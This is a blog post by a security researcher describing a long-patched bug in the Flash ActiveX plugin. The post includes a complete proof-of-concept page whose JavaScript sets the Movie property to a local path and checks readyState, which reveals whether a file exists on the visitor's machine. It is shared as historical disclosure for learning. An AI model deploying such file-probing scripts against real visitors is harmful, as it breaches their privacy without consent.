Flash Plugin: Checking Whether a Local File Exists via readyState

After finding the Office XP ActiveX file-existence check, I wondered whether the Flash plugin had a similar observable side channel. It did. By setting the Movie property of a Flash <object> element to a local file path and then checking the readyState value, a web page could determine whether that file existed on the user’s machine. On Vista, the Windows directory was off-limits, but most other paths were fair game.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>FlashCheckIfLocalFileExists</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>FlashCheckIfLocalFileExists</h2>
</center>
<hr />
	<b>Note:</b> This bug works by using the Adobe Flash PlugIn. On Vista, you won't be able to read the Windows directory.<br /><br />
	Type a fileName and we will check if it exists or not:<br /><br />
	<input type="text" size="50" value="c:\Program Files\Internet Explorer\iexplore.exe" id="fileName">&nbsp;&nbsp;&nbsp;<input type="button" value="Check if Exists" onclick="setMovieSrc()"><br /><br />
<hr />
<br />
We are changing the source (Movie property) of the Flash Object and checking the readyState value. If readyState == 4, it means that the file does not exist. Otherwise, the file exists.<br /><br />
<hr />
&lt;OBJECT id="<b>flashObject</b>" width="10" height="10" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"&gt;<br />
&lt;PARAM NAME="Movie" VALUE="nothing"&gt;<br />
&lt;/OBJECT&gt;<br /><br />
<font color="blue">
document.all.<b>flashObject</b>.Movie = "FullPathToFileName (c:\.....)";<br />
if (document.all.<b>flashObject</b>.readyState == 4)<br />
{<br />
&nbsp;&nbsp;&nbsp;alert("File not found");<br />
}<br />
else<br />
{<br />
&nbsp;&nbsp;&nbsp;alert("File Exists!!");<br />
}<br />
</font>
<hr />
<br /><br />
<object id="flashObject" width="10" height="10" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="Movie" value="nothing">
</object>

<script language="JavaScript">
function setMovieSrc()
{
	document.all.flashObject.Movie = document.all.fileName.value;
	setTimeout('checkReadyState()', 100);
}
function checkReadyState()
{
	if (document.all.flashObject.readyState == 4)
	{
		alert("File not found");
	}
	else
	{
		alert("File Exists!!");
	}
}

</script>
</font>
</body>
</html>

The Flash ActiveX control reports readyState == 4 (complete/error) when it cannot load the specified Movie source, which is the same value used for “load failed”. When the file path points to a local file that exists, Flash attempts to load it and enters a different readyState (typically 1 or 2 while loading, or a non-4 state on access denial). This difference is observable from JavaScript on the hosting page, making it a reliable binary oracle for local file existence. The 100ms setTimeout gives Flash just enough time to attempt the load before the check runs.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE6: Checking Whether a Local File Exists via Dashboard ActiveX] :: [UXSS Using Flash getURL POST Method] >